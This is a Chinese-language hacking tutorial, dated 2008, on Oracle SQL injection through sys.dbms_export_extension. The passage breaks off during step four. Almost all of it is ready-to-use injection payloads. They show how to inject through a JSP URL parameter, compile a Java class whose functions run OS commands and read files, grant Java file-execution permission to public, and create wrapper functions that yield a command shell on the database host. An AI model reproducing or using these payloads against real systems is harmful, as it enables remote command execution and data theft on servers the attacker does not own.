犀利的 oracle 注入技术
犀利的 oracle 注入技术
原文发表在黑客手册
linx 2008.1.12
介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。
以下的演示都是在web上的sql plus执行的,在web注入时 把select sys.dbms_export_extension…..改成
/xxx.jsp?id=1 and '1'<>'a'||(select sys.dbms_export_extension…..)
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 sys.dbms_export_extension 函数,在oracle上创建java包linxutil,里面两个函数,runcmd用于执行系统命令,readfile用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace and compile java source named "linxutil" as import java.io.*; public class linxutil extends object {public static string runcmd(string args) {try{bufferedreader myreader= new bufferedreader(
new inputstreamreader( runtime.getruntime().exec(args).getinputstream() ) ); string stemp,str="";while ((stemp = myreader.readline()) != null) str +=stemp+"\n";myreader.close();return str;} catch (exception e){return e.tostring();}}public static string readfile(string filename){try{bufferedreader myreader= new bufferedreader(new filereader(filename)); string stemp,str="";while ((stemp = myreader.readline()) != null) str +=stemp+"\n";myreader.close();return str;} catch (exception e){return e.tostring();}}
}'''';end;'';end;–','sys',0,'1',0) from dual
)
————————
如果url有长度限制,可以把readfile()函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace and compile java source named "linxutil" as import java.io.*; public class linxutil extends object {public static string runcmd(string args) {try{bufferedreader myreader= new bufferedreader(
new inputstreamreader( runtime.getruntime().exec(args).getinputstream() ) ); string stemp,str="";while ((stemp = myreader.readline()) != null) str +=stemp+"\n";myreader.close();return str;} catch (exception e){return e.tostring();}}
}'''';end;'';end;–','sys',0,'1',0) from dual
)
同时把后面步骤 提到的 对readfile()的处理语句去掉。
——————————
2.赋java权限
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''begin dbms_java.grant_permission( ''''''''public'''''''', ''''''''sys:java.io.filepermission'''''''', ''''''''<<all files>>'''''''', ''''''''execute'''''''' );end;'''';end;'';end;–','sys',0,'1',0) from dual
3.创建函数
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace function linxruncmd(p_cmd in varchar2) return varchar2 as language java name ''''''''linxutil.runcmd(java.lang.string) return string''''''''; '''';end;'';end;–','sys',0,'1',0) from dual
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace function linxreadfile(filename in varchar2) return varchar2 as language java name ''''''''linxutil.readfile(java.lang.string) return string''''''''; '''';end;'';end;–','sys',0,'1',0) from dual
4.赋public执行函数的权限
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''gran